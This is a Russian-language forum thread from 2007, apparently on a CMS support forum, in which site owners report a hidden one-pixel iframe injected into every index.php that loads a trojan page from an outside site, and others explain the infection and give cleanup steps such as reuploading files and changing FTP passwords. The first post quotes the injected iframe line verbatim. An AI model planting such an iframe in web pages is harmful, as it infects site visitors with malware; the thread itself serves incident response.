Регистрация
Вход через соцсети
Восстановление пароля

внедрение в index.php ссылка на троян

Новый топик
Страницы: 1  |  2  |  3  |  4
22.04.2007, 23:39
Ответить | Цитировать
Гость
Гость

Добрый день.
Обнаружил на сайте версии 2.4 внедрение следующего кода во все index.php в разных папках.
Код:
<iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe>


Как с эти бороться? В чем уязвимость?
23.04.2007, 14:19
Ответить | Цитировать
h/z

Зарегистрирован:
2007-02-06
Сообщений: 755

чаще всего еще и добавляется php файлик (c функцией "backdoor") с помощью которого злоумышленник может снова получить доступ к файлам на вашем сайте

1) необходимо найти и удалить все посторонние файлы и записи в файлах
2) перезалейте файлы НетКета (возможно обновления отвалятся)
3) поменяйте пароли на фтп и почту
25.04.2007, 23:10
Ответить | Цитировать
Гость
Гость

[cenzored] отрву [cenzored] не ходите на этот сайт там вирусы [cenzored]
26.04.2007, 12:35
Ответить | Цитировать
h/z

Зарегистрирован:
2007-02-06
Сообщений: 755

разумеется там вирусы, потому что эта ссылка открывается в невидимом ифрейме на взломанных сайтах, чтобы заражать посетителей.
владелец сайта лишь жертва взлома.
26.04.2007, 16:25
Ответить | Цитировать
ktotoff
АльтерЛан

Зарегистрирован:
2006-12-19
Сообщений: 330

У меня тоже такая хрень стряслась.
Не забудьте свой комп промониторить на предмет троянов.

Ну и тематический топик:
http://www.securitylab.ru/forum/read.php?FID=16&TID=38876



...жизнь прекрасна, когда правильно подобраны антидепрессанты...
29.05.2007, 15:31
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

хех, принимайте пополнение в свои ряды! :'(

Temet nosce...
20.06.2007, 12:51
Ответить | Цитировать
Гость
Гость

Ну что ж Вы товарищи позаражались нафик и прое....ли паролики к ftp. Вот вам и вирусняк.
06.07.2007, 19:18
Ответить | Цитировать
Гость
Гость

Как с эти бороться? - перезалить неткат (удалить код или заменить файлы цмс)

В чем уязвимость? - попытка загрузки вируса со стороннего ресурса. кто-то получил доступ по фтп (обычно такое происходит на valuehost). По своему опыту - файл index.php не является выводимым файлом, этот файл сам формирует выводимые страницы сайта по технологии неткат, то есть этот код не будет работать как планировали злоумышленники. В худшем случае, из-за нарушения процедур программы вывода страниц, сайт "упадет".
09.07.2007, 13:57
Ответить | Цитировать
DavydovFV

Зарегистрирован:
2007-07-09
Сообщений: 1

да валю-хвостатый отличился этим в свое время... >(

пво мво дмб II/01 202-ая зрбр
12.07.2007, 16:34
Ответить | Цитировать
MihaKot
Аксарин Константин

Зарегистрирован:
2005-01-22
Сообщений: 38

еще этим страдает infobox
у одного из моих клиентов за неделю три раза такое было.
20.07.2007, 02:19
Ответить | Цитировать
Nemo
НПЦ Владис

Зарегистрирован:
2005-02-17
Сообщений: 48

зашел с КПК, поменял на фтп пароль... через двое суток сайт сломан...
на сайте только стандартные шаблоны, что давались ничего от себя...

Сломан уже не один и даже не пять сайтов...
Хостеры: Sweb, PeterHost, MasterHost - очевидно проблема в самой CMS, что могут сказать разработчики?
и вопрос два, когда будет версия с годовой поддержкой, и будут такие вот дыры находится раз в год... то чтобы залатать придеться платить поддержку?

Антон
198 196 2010-03-31 17:59:14 7098
Страницы: 1  |  2  |  3  |  4
Описание проекта